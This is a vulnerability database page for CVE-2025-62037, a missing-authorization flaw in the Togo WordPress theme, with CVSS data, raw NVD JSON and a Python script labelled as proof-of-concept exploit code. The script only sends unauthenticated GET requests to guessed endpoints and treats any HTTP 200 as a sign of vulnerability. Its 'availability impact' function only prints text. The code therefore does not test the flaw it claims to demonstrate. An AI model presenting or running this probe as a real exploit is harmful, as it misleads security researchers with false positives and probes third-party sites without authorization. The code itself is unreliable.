Security Vulnerability Report
中文
CVE-2025-62037 CVSS 6.5 MEDIUM

CVE-2025-62037

Published: 2025-11-06 16:16:10
Last Modified: 2026-04-27 17:16:30

Description

Missing Authorization vulnerability in uxper Togo togo.This issue affects Togo: from n/a through < 1.0.4.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Togo WordPress Theme < 1.0.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-62037 PoC - Togo Theme Broken Access Control # Target: WordPress site with Togo Theme < 1.0.4 TARGET_URL = "http://target-wordpress-site.com" def check_vulnerability(): """ Check if target is vulnerable to CVE-2025-62037 This PoC demonstrates unauthorized access to protected endpoints """ # Common endpoints that might be affected by missing authorization vulnerable_endpoints = [ f"{TARGET_URL}/wp-admin/admin-ajax.php", f"{TARGET_URL}/wp-json/togo/v1/", f"{TARGET_URL}/?rest_route=/togo/v1/" ] print("[*] Testing for CVE-2025-62037 - Togo Theme Broken Access Control") print(f"[*] Target: {TARGET_URL}") print("[*] This vulnerability allows low-privilege users to access admin functions") for endpoint in vulnerable_endpoints: try: # Try to access with minimal/no authentication response = requests.get(endpoint, timeout=10) # Check if we can access admin functionality without proper authorization if response.status_code == 200: print(f"[+] Potential vulnerable endpoint found: {endpoint}") print(f"[+] Status: {response.status_code}") except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") def exploit_availability_impact(): """ Demonstrate availability impact (A:H) per CVSS vector Attackers can cause service disruption """ print("[*] Testing availability impact...") print("[*] The vulnerability allows attackers to impact service availability") print("[*] This can lead to denial of service conditions") if __name__ == "__main__": check_vulnerability() exploit_availability_impact()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62037", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:16:10.070", "lastModified": "2026-04-27T17:16:30.490", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in uxper Togo togo.This issue affects Togo: from n/a through < 1.0.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/togo/vulnerability/wordpress-togo-theme-1-0-4-broken-access-control-vulnerability-2?_s_id=cve", "source": "[email protected]"}]}}